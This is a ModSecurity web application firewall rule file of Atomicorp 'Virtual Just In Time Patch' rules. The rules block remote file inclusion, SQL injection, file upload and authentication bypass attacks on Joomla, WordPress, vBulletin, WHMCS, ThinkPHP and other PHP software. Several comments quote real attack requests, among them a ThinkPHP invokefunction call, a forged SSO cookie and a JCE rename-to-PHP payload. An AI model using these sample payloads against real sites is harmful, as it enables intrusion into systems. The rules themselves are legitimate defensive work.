SecRule REQUEST_URI "plugin_googlemap(?:2_proxy|3_kmlprxy)\.php\?url=(.*)" "phase:1,t:none,t:urlDecodeUni,t:lowercase,capture,chain,log,deny,status:403,auditlog,id:336468,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Google Maps plugin for Joomla probe'"
SecRule TX:1 "!@beginsWith %{request_headers.host}" "t:none,t:lowercase"
#/plus/download.php?open
SecRule REQUEST_URI "/plus/download\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336467,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible chained PHP array injection attack',logdata:'%{TX.0}'"
SecRule &ARGS:/^arrs1\[\]/ "@gt 1"
SecRule REQUEST_URI "/ofc_upload_image\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336460,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Open Flash Charts File Upload Attack',logdata:'%{TX.0}'"
SecRule ARGS:name "\.(?:php|pl|cgi)" "t:none,t:lowercase"
#rsession_init.php?PHPSESSID=000000000000000000000000000000000&failure_redirect_url
SecRule REQUEST_URI "/rsession_init\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336459,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Plesk secret_key attack',logdata:'%{TX.0}'"
SecRule ARGS:failure_redirect_url "^(.*)$" "capture,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
SecRule TX:1 "!@rx ://%{SERVER_NAME}/" "t:none,t:lowercase"
#WP pingback
#Only uses two headers, URL and Host
#Check for useragent header, if missing, attack
SecRule REQUEST_URI "/xmlrpc\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336359,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress pingback zombie attack',logdata:'%{TX.0}'"
SecRule XML:/* "pingback\.ping" "t:none,t:lowercase,chain"
SecRule &REQUEST_HEADERS:Host "@eq 1" "t:none,chain"
SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"
#Vbulletin zeroday
#upgrade.php
#version=install
#htmldata=username
SecRule REQUEST_URI "/upgrade\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331358,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vbulletin zero day attack',logdata:'%{TX.0}'"
SecRule ARGS:version "install" "t:none,t:lowercase,chain"
SecRule ARGS:htmldata[username] ".*" "t:none,t:lowercase,t:urlDecodeUni"
#AES_ENCRYPT
SecRule REQUEST_URI "/(?:clientarea\.php\?action=details|viewticket\.php)" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331357,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WHMCS SQL injection attack',logdata:'%{TX.0}'"
SecRule ARGS:firstname|ARGS:lastname|ARGS:/^tid/ "(?:aes_encrypt|tbl(?:admins|clients|hosting|servers|tickets|contact|registars|invoices|orders|paymentgateways|verificationdata|gatewaylog|domains|accounts|adminlog))" "t:none,t:lowercase"
#WP 3.6 and lower serialize name change exploit
SecRule REQUEST_URI "wp-admin/profile.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:321357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress serialize name change attack',logdata:'%{TX.0}'"
SecRule ARGS:first_name|ARGS:last_name|ARGS:display_name ":" "t:none,t:urlDecodeUni"
#configuration.php-dist
SecRule REQUEST_FILENAME "configuration\.php-dist" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:321356,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla probe',logdata:'%{TX.0}'"
#/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
SecRule REQUEST_FILENAME "/editor/filemanager/connectors/php/connector\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:388000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Attempt to Access vulnerable FCKeditor file upload connector (Disable if you have configured this connector to require authentication)',logdata:'%{TX.0}'"
SecRule ARGS:command "(?:getfoldersandfiles|fileupload)" "t:none,t:urlDecodeUni,t:lowercase"
#PHP version probe using easter eggs
SecRule REQUEST_URI "php(?:e9568f3[56]-d428-11d2-a769-00aa001acf42|b8b5f2a0-3c92-11d3-a3a9-4c7b08c10000)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380800,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Easter Egg Access',logdata:'%{TX.0}'"
SecRule REQUEST_URI "phpe9568f34-d428-11d2-a769-00aa001acf42" "phase:2,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380801,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Easter Egg Access',logdata:'%{TX.0}'"
#INJECTION RULES
##RFI/injection rules
SecRule ARGS|REQUEST_URI "@pm http:// https:// ftp:// ftps:// ogg:// zlib:// gopher:// php:// data://" "id:333866,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309001,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_INJECTION_RULES"
#plugin injection
SecRule REQUEST_FILENAME "\.php" "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:390760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
SecRule ARGS:/plugin_dir/ "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
#e107 vulns
SecRule ARGS:ifile|ARGS:plugindir|ARGS:THEMES_DIRECTORY "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:393756,rev:1,severity:1,t:none,t:htmlEntityDecode,t:urlDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:e107 RFI attack',logdata:'%{TX.0}'"
#390655
SecRule ARGS:/^SYSURL/ "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:390655,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SYSURL RFI attack Vulnerability'"
SecRule ARGS:get "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:390656,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: get variable RFI attack Vulnerability'"
# Rule 310019: generic remote file inclusion vulns
SecRule ARGS:/gallery_basedir/|!ARGS:include_location "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:391760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
SecRule REQUEST_FILENAME "tiki-index\.php" "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:395760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
SecRule ARGS:page "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310054: b2 cafelog gm-2-b2.php remote file include attempt
SecRule REQUEST_FILENAME "/gm-2-b2\.php" "phase:2,id:310054,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: b2 cafelog gm-2-b2.php remote file include attempt',chain"
SecRule REQUEST_URI "b2inc=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310055: BLNews objects.inc.php4 remote file include attempt
SecRule REQUEST_FILENAME "/objects\.inc\.php" "phase:2,id:310055,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: BLNews objects.inc.php4 remote file include attempt',chain"
SecRule REQUEST_URI "server\[path\]=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310056: ttCMS header.php remote file include attempt
SecRule REQUEST_FILENAME "/admin/templates/header.php" "phase:2,chain,id:310056,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttCMS header.php remote file include attempt'"
SecRule REQUEST_URI "admin_root=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310059: pmachine remote file include attempt
SecRule REQUEST_URI "lib\.inc\.php" "phase:2,id:310059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pmachine remote file include attempt',chain"
SecRule ARGS:pm_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310090:/forum/viewtopic.php?x=http://
SecRule REQUEST_FILENAME "/forum/viewtopic\.php" "phase:2,chain,id:310090,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Forum remote include attempt'"
SecRule ARGS:x "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310227:/auth.php?path=http://[attacker]/
SecRule REQUEST_FILENAME "/authphp" "phase:2,chain,id:310227,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.php remote file inclusion attempt'"
SecRule ARGS:path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310233: PHP Form Mail Script File Incusion vuln
SecRule REQUEST_FILENAME "/inc/formmail\.inc\.php" "phase:2,chain,id:310233,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP formmail.inc.php file inclusion attempt'"
SecRule ARGS:script_root "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310234: download Center Lite command execution vuln
SecRule REQUEST_FILENAME "/inc/download_center_lite\.inc\.php" "phase:2,chain,id:310234,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: download Center Lite download_center_lite.inc.php command execution attempt'"
SecRule ARGS:script_root "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310235: /modules/mod_mainmenu.php?mosConfig_absolute_path=http://
SecRule REQUEST_FILENAME "/modules/mod_mainmenu\.php" "phase:2,chain,id:310235,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mod_mainmenu.php command execution attempt'"
SecRule ARGS:mosConfig_absolute_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310236: phpWebLog command execution
SecRule REQUEST_FILENAME "/init\.inc\.php" "phase:2,chain,id:310236,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog init.inc.php command execution attempt'"
SecRule ARGS:G_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310238: mcNews command execution
SecRule REQUEST_FILENAME "/admin/header\.php" "phase:2,chain,id:310238,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcNews header.php command execution attempt'"
SecRule ARGS:skinfile "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310240: votebox
SecRule REQUEST_URI "/votebox\.php\?voteboxpath=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310240,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: votebox.php command execution attempt'"
# Rule 310267: Remote File Inclusion Vulnerability in phpWebLog
SecRule REQUEST_URI "/include/init\.inc\.php\?G_path=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310267,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog init.inc.php remote file inclusion attempt'"
# Rule 310293: PHPOpenChat
SecRule ARGS:poc_root_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310293,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: poc_root_path remote file inclusion attempt'"
# Rule 310295: PHPOpenChat
SecRule REQUEST_URI "/poc\.php\?sourcedir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310295,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPOpenChat poc.php remote file inclusion attempt'"
# Rule 310297: mcNews Remote command execution
SecRule REQUEST_URI "/admin/install\.php\?l=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310297,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcNews install.php remote command execution attempt'"
SecRule REQUEST_FILENAME "/page_tail\.php" "chain,id:390282,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: page_tail RFI injection Vulnerability'"
SecRule ARGS:includePath "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|^test)"
##############index.php bypass################################
SecRule REQUEST_FILENAME "index\.php" "id:333867,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309002,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_INJECTION_RULES"
# Rule 310237: phpWebLog command execution
SecRule REQUEST_FILENAME "/backend/addons/links/index\.php" "phase:2,chain,id:310237,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog backend index.php command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)\:/"
# Rule 310268: Remote File Inclusion Vulnerability in phpWebLog
SecRule REQUEST_URI "addons/links/index\.php\?path=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310268,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog links/index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310289: PHP-Nuke remote file include attempt
SecRule REQUEST_URI "/index\.php*file=*(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310289,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
#390651
#Joomla! Shoutbox Pro Component "controller" Local File Inclusion Vulnerability
SecRule ARGS:controller "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|/(?:etc|proc|sys|tmp|var|home))" "phase:2,id:390651,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla! Shoutbox Pro Component controller Local File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310274: Multiple Vulnerabilities in auraCMS
SecRule ARGS:query "(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,id:310274,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA index.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310337: Vortex Portal Remote File Inclusion and Path Disclosure
# Vulnerabilities
SecRule ARGS:act "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310337,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310392:AlstraSoft EPay Pro Remote File Include Vulnerability
SecRule REQUEST_URI "/epal/index\.php\?view=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310392,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AlstraSoft EPay Pro epal/index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310019:honeypot catch
SecRule REQUEST_URI "/index\.php\?page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310580,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Page argument RFI injection attempt'"
# Rule 310019: honeypot
SecMarker END_PHP_JITP_INJECTION_RULES
#/apps/files/ajax/scan.php?force=true&dir=&requesttoken=
SecRule REQUEST_URI "/apps/files/ajax/scan\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331323,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Potential Owncloud information leakage attack blocked',logdata:'%{TX.0}'"
SecRule ARGS:scan "true" "t:none,t:urlDecodeUni,t:lowercase"
##############index.php rules################################
SecRule REQUEST_FILENAME "index\.php" "id:333868,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309003,t:none,pass,nolog,noauditlog,skipAfter:END_INDEX_PHP_JITP"
#/index.php?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP
SecRule ARGS:s "invokefunction" "phase:2,deny,log,auditlog,id:393753,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LFI attack blocked',chain"
SecRule ARGS:function "call_" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:username|ARGS:password|ARGS:uid "tostring\(" "phase:2,deny,log,auditlog,id:393754,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP code injection attack blocked'"
#GET /install/index.php?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.0
SecRule ARGS:install_demo_name "config_update\.php" "phase:2,deny,log,auditlog,id:393752,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LFI attack blocked'"
SecRule REQUEST_URI "/index\.php" "chain,capture,phase:2,deny,log,auditlog,id:390737,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Image Upload - Arbitrary File Upload'"
SecRule ARGS:option "com_simpleimageupload" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:view "upload" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:tmpl "component" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)" "t:none,t:lowercase,t:urlDecodeUni"
#/index.php?loginFailed=1&sso_referer=&sso_cookie=YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=
SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333458,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DOKEOS ce30 Authentication Bypass attack blocked'"
SecRule ARGS:sso_cookie "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30" "t:none"
#/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
#upload-dir=/&upload-overwrite=0&upload-name=0day&action=upload
#upload-dir=/&upload-overwrite=1&action=upload
SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333358,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Potential JCE image manager attack',logdata:'%{TX.0}'"
SecRule ARGS:option "com_jce" "t:none,t:lowercase,chain"
SecRule ARGS:file "imgmanager" "t:none,t:lowercase,chain"
SecRule ARGS:/upload/ ".*" "t:none,t:lowercase"
#/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw
#/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
#json={"fn":"folderRename","args":["/0day.gif","0day.php"]}
SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333359,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JCE image attempt to rename image file to PHP attack',logdata:'%{TX.0}'"
SecRule ARGS:option "com_jce" "t:none,t:lowercase,chain"
SecRule ARGS:plugin "imgmanager" "t:none,t:lowercase,chain"
SecRule ARGS:json "folderrename.*:.*(?:p(?:hp|l)|cgi)" "t:none,t:lowercase"
#nonumbers plugin vuln
#index.php?nn_qp=1&url=h
SecRule ARGS:nn_qp "^1$" "phase:2,chain,id:391663,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:url "^(?:ht|f)tps?:/" chain
SecRule ARGS_NAMES "curl"
#probe
SecRule REQUEST_URI "/index\.php\?nn_qp=1&url=https?://[a-z0-9\.\-\_\/]+$" "phase:2,id:391664,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability Probe',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# ibProArcade Module "user" SQL Injection Vulnerability
SecRule ARGS:user "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)" "phase:2,id:391662,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Module user SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310251: citrusdb directory traversal
#adjust these to your system, you might need to upload
SecRule REQUEST_FILENAME "tools/index\.php" "phase:2,chain,id:310251,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/index.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:load "\.\./"
# Rule 310252: citrusdb upload authorization bypass (CAN-2005-0409)
SecRule REQUEST_URI "citrusdb/tools/index\.php\?load=importcc\&submit=on" "phase:2,id:310252,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/index.php upload authorization bypass attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310058: ttforum remote file include attempt
SecRule REQUEST_URI "forum/index\.php" "phase:2,id:310058,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttforum remote file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "template="
# Rule 310066: IdeaBox notification.php file include
SecRule REQUEST_URI "/index\.php" "phase:2,id:310066,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: IdeaBox file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "(?:notification|cord)\.php"
# Rule 310335: Dream4 Koobi CMS Index.PHP SQL Injection Vulnerability
SecRule REQUEST_URI "/index\.php\?p=articles" "phase:2,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310335,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS index.php SQL injection attempt'"
SecRule ARGS:area "'"
# Rule 310346:exoops Input Validation Flaws SQL injection and XSS
SecRule ARGS:viewcat "\'" "phase:2,id:310346,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310347:exoops Input Validation Flaws SQL injection and XSS
SecRule REQUEST_URI "/modules/sections/index\.php\?op=viewarticle&artid=9\x2c+9\x2c+9" "phase:2,id:310347,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops sections/index.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310372:Lighthouse Development Squirrelcart SQL Injection Vulnerability
SecRule ARGS:crn "\'" "phase:2,id:310372,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Lighthouse Squirrelcart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310382:InterAKT Online MX Kart Multiple SQL Injection Vulnerabilities
SecRule REQUEST_URI "/index\.php\?mod=(?:pages|category)&(?:idp|id_ctg)=\'" "phase:2,id:310382,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: InterAKT MX Kart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310405: phpMyAdmin convcharset Parameter Cross Site Scripting
SecRule REQUEST_URI "/phpmyadmin/index\.php" "phase:2,chain,id:310405,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin index.php convcharset parameter cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:convcharset "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310407: cubecart SQL injection
SecRule ARGS:phpsessid "\'" "phase:2,id:310407,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310425:phpbb plus
SecRule REQUEST_FILENAME "/index\.php" "phase:2,chain,id:310425,t:none,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB index.php SQL injection attempt'"
SecRule ARGS:c|ARGS:mark "'" "t:none,t:urlDecodeUni"
# Rule 310445:squirrelcart SQL injection
SecRule REQUEST_URI "index\.php" "phase:2,id:310445,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Squirrelcart index.php SQL injection attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:crn "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+(?:from|into|table|database|index|view)"
# Rule 310466: eGroupWare index.php cats_app Variable SQL Injection
SecRule REQUEST_URI "/index\.php\?menuaction=preferences\.uicategories\.index\&cats_app=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310466,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare index.php SQL injection attempt'"
# Rule 310467: eGroupWare tts/index.php filter Variable SQL Injection
SecRule REQUEST_URI "/tts/index\.php\?filter=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310467,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare tts/index.php SQL injection attempt'"
SecMarker END_INDEX_PHP_JITP
##############index.php rules################################
#
#53
#FreePHPBlogSoftware "phpincdir" File Inclusion Vulnerability
